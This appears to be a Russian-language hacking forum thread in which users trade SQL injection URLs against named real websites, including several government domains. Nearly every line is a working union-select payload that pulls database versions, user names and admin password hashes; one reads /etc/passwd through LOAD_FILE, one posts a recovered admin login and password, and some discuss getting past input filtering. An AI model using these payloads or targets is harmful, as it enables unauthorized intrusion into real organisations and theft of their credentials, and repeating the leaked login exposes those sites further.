Code: http://hells.timeserv.biz/cms/page_view.php?id=110+union+select+1,2,password,admin+from+settings/* version 4.1.21-standard
Code: _http://www.hudaweb.com/movlit//autor.php?autor=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* Зы со скриптом подбор колонок стал намного быстрее... P.S. Скрипт можно взять тут: https://forum.antichat.ru/thread46849.html Удачных скулей!
Code: _http://www.elforat.net/autor.php?id=-1+union+select+1,2,3,4,5/* Code: http://www.bajazzoverlag.ch/autor.php?id=-1+union+select+1,2,3,4,5,6,7/* Code: _http://www.3darena.de/autor/php/autor.php?autor_id=-1+union+select+concat(user(),version())/*
вэб-дизайн Студия 5d.ru Code: http://www.iq-design.ru/content.php?act=tehnolog&div=-6+union+select+1,version(),3,4+from+news/* Code: http://www.nikas-s.ru/gallery.php?tab=photo&dir=-3+union+select+1,2,3,version(),5,6/* Code: http://www.interstahl.ru/?act=news&id=-2+union+select+1,2,3,4,5,user() Code: http://www.countrytravel.ru/second.php?act=main&div=-2+union+select+1,2,version(),4,5/* Code: http://www.razvod.ru/man.php?id=-651+union+select+1,2,3,concat_ws(0x3a,name,version()),5,6,7,8,9+from+authors/* Code: http://www.albitec.ru/content.php?cat=news&id=-25+union+select+1,2,3,4,5,6,7,8/* Code: http://www.interfax-religion.ru/?act=dujour&div=-275+union+select+1,version(),3,4,5,6,7,8,9,10/* Code: http://www.hifitech.ru/?act=product&id=-2632+union+select+1/* Code: http://www.kiyama.ru/content.php?act=mnu&browse=node&id=-64+union+select+1,2,3,4,5,6,7,8/* Code: http://www.bladeserver.ru/?act=news&id=-7+union+select+1,2,3,4,char(60,98,114,62,60,98,62,65,52,97,116,45,114,117,108,101,122,122,122,122,60,47,98,62),6,7,8,9/* ребята очень упорно плодят уязвимые сайты
Моя первая SQL Инъекция :\ Code: http://www.rapha.cc/index.php?page=-1+union+select+1,2,LOAD_FILE('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
Code: http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,3,4,5/* http://www.nonom.cn/showmz.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
http://wow.crpg.ru/article.php?sid=-1+union+select+database(),2,version(),4,5,6,7,user(),9,10,11,12/* дальше не пошло =(
По моему тут надо таким способом, а иначе фильтрация работает... http://wow.crpg.ru/article.php?sid=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),5,6,7,8,9,10,11,12/* З.Ы. Но дальше тоже не пошло
sql Red_Red1 Calcutta --> вывода нет но вывод есть здесь: ибо crpg.ru и rolemancer.ru на одном сервере /ps/ антибоян http://antiboyansql.narod.ru/sql.txt ------------------------------------------------------------------------ DRoT1K -> ----------------- -> авторизация
Code: http://www.iltod.gov.mn/forum.php?cat=-1+union+select+1,2,USER(),4,5/* Code: http://www.sante.gouv.sn/actualites.php?id=1+union+select+1,2,3,4/* Code: http://www.muat.gouv.sn/projets.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,19/* Code: http://www.denv.gouv.sn/activites/details.php?id=1'+union+select+1,2,USER(),4,5,6/*
http://www.utcongress.nl/user/php/congress.php?id=-10+union+select+1,password,3,4,5,6,7,8,9%20from%20user/* Лови. Пароль (точнее хеш) показывает, а вот колонку логина не подобрал. И откуда эти пароли хз!
Code: http://www.denv.gouv.sn/activites/details.php?id=1'+union+select+1,2,login,password,5,6+from+admin/* admin: passe
http://perspektiva.ural.ru/index.php?cat=52&pcat=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat([$%$#$],char(58),pass),0x17),0x17)+from+user/* Я очень долго .... себе этим мозг, но первое поле подобрать не смог... Может у кого получится? З.Ы, вот ещё http://perspektiva.ural.ru/index.php?cat=52&pcat=-1+union+select+AES_DECRYPT(AES_ENCRYPT(pass,0x17),0x17)+from+adm/*
тут многоуровневй запрос Code: http://www.mtas.ru/second.php?ID=-15+union+select+razdeli_name+from+razdeli/* вот так работает,)) смотрим текст ошибки ) надо терь подобрать таблицу юзеров ))
.gov: Code: http://teleslin.lbl.gov/mysql/parseRTML2.php?id=-77+union+select+version(),user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/*
